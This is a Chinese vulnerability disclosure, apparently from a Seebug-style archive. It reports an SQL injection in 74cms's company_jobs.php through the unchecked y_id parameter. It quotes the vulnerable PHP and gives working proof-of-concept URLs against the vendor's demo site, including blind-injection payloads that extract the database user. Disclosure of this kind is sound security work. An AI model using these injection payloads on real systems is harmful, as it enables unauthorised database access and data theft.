### 简要描述:
骑士CMS某接口SQL注入,官网测试。
### 详细说明:
翻了翻代码,看到有这么一段:
user/company/company_jobs.php:
```
elseif ($act=='jobs_perform')
{
global $_CFG;
$yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id'];
$jobs_num=count($yid);
if (empty($yid))
{
showmsg("ÄãûÓÐÑ¡Ôñְλ£¡",1);
}
$refresh=!empty($_POST['refresh'])?$_POST['refresh']:$_GET['refresh'];
$delete=!empty($_POST['delete'])?$_POST['delete']:$_GET['delete'];
if ($refresh)
{
if($jobs_num==1){
if(is_array($yid)){
$yid = $yid[0];
}
$jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid);
if(empty($jobs_info)){
$jobs_info = $db->getone("select * from ".table('jobs_tmp')." where id=".$yid);
}
if($jobs_info['deadline']<time()){
showmsg("žÃְλÒѵœÆÚ£¬ÇëÏÈÑÓÆÚ£¡",1);
}
}
```
下面的GET/POST参数没有check,
```
$yid =!empty($_POST['y_id'])?$_POST['y_id']:$_GET['y_id']
```
然后就带入了SQL:
```
$jobs_info = $db->getone("select * from ".table('jobs')." where id=".$yid);
```
这不是可以注入么?官网试试,果然是这样:
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27
```
返回SQL错误:
[<img src="https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png)
好了,试试盲注猜user():
错误的返回:
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110))
```
[<img src="https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png)
正确时候的返回:
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114))
```
[<img src="https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png)
中间过程略,可以猜到:
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116))
```
[<img src="https://images.seebug.org/upload/201411/011806477efd8b7deb1fc2e53542c3b5121afc9e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/011806477efd8b7deb1fc2e53542c3b5121afc9e.png)
```
> select char(114,111,111,116,64,108,111,99,97,108,104,111,115,116);
+------------------------------------------------------------+
| char(114,111,111,116,64,108,111,99,97,108,104,111,115,116) |
+------------------------------------------------------------+
| root@localhost |
+------------------------------------------------------------+
1 row in set (0.00 sec)
```
### 漏洞证明:
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19%27
```
[<img src="https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01175803fa824fc4b3ec41b526dff671d2ad7506.png)
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(110))
```
[<img src="https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0118023093d25c3283452cbb9c6aa8aa30e1dd5a.png)
```
http://demo.74cms.com/user/company/company_jobs.php?act=jobs_perform&refresh=1&y_id=19 or strcmp(substr(user(),1,1),char(114))
```
[<img src="https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01180247d20568189ee1550b622ad657487c60c2.png)
京公网安备 11010502034610号
暂无评论